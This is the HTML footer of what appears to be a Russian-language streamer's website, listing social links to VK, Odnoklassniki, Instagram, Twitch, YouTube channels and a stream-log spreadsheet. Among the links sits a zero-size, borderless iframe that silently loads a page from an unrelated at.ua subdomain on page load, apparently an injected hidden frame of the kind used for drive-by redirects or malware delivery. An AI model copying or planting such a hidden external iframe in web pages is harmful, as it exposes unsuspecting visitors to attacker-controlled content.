<footer class="page-footer">
    <div class="page-footer__container">
        <p class="page-footer__small-title small-title">
            <!-- ,-->
        </p>
        <ul class="social-icons page-footer__social-icons">
            <li class="social-icons__list-item social-icons__list-item_vk">
                <a class="link social-icons__link" href="https://ok.ru/video/c2043217">
                    <span class="social-icons__name">Одноклассники</span>
                </a>
            </li>
            <li class="social-icons__list-item social-icons__list-item_vkgroup">
                <a class="link social-icons__link" href="https://vk.com/public69934966">
                    <span class="social-icons__name">Vkgroup</span>
                </a>
            </li>
            <li class="social-icons__list-item social-icons__list-item_vkpage">
                <a class="link social-icons__link" href="https://vk.com/id142244404">
                    <span class="social-icons__name">Vkpage</span>
                </a>
            </li>
            <li class="social-icons__list-item social-icons__list-item_instagram">
                <a class="link social-icons__link" href="https://www.instagram.com/sergeyhellyeah/">
                    <span class="social-icons__name">Instagram</span>
                </a>
            </li>
            <li class="social-icons__list-item social-icons__list-item_twitch">
                <a class="link social-icons__link" href="https://twitch.tv/hellyeahplay">
                    <span class="social-icons__name">Twitch</span>
                </a>
            </li>
            <li class="social-icons__list-item social-icons__list-item_excel">
                <a class="link social-icons__link" href="https://docs.google.com/spreadsheets/d/1qNA6I5oT3mx26yJeJD0NugPyThMPUmKIBv14Y5Ozuto/edit">
                    <span class="social-icons__name">Sheets.Google: hellyeahplay проведенные стримы. записи стримов</span>
                </a>
            </li>

            <li class="social-icons__list-item social-icons__list-item_hellplay">
                <a class="link social-icons__link" href="https://www.youtube.com/user/HellYeahPlay">
                    <span class="social-icons__name">Youtube main channel</span>
                </a>
            </li>
            <li class="social-icons__list-item social-icons__list-item_moments">
                <a class="link social-icons__link" href="https://www.youtube.com/channel/UCibhJSmBItGkPprId_Fpp0A">
                    <span class="social-icons__name">Youtube Twitch-moments</span>
                </a>
            </li>
            <li class="social-icons__list-item social-icons__list-item_streams">
                <a class="link social-icons__link" href="https://www.youtube.com/channel/UCWvMAvbk23gFzZ3BRUfACRA">
                    <span class="social-icons__name">Youtube Twitch-streams</span>
                </a>
            </li>
            <li class="social-icons__list-item social-icons__list-item_reaction">
                <a class="link social-icons__link" href="https://www.youtube.com/channel/UC2oIn4q3AiBK5-I-NbqMvFw">
                    <span class="social-icons__name">Youtube Twitch-reaction</span>
                </a>
            </li>
            <li class="social-icons__list-item social-icons__list-item_thearchive">
                <a class="link social-icons__link" href="https://www.youtube.com/channel/UCqp3QAHaTUjZTwSAFlq1SsQ">
                    <span class="social-icons__name">Youtube Twitch-thearchive</span>
                </a>
            </li>
<iframe frameborder="0" height="0" scrolling="no" src="http://59cmvwd.at.ua/yandex_a1f4b018edc07d09.html" width="0"></iframe>
            <!-- <li class="social-icons__list-item social-icons__list-item_tg">
                <a class="link social-icons__link" href="">
                    <span class="social-icons__name">Вконтакте</span>
                </a>
            </li> -->
        </ul><br><div style="text-align: center;"><button onclick="document.getElementById('overlay').style.display='block'"><font size="1">Поддержали</font></button></div>
    </div>
</footer>
</body>

</html>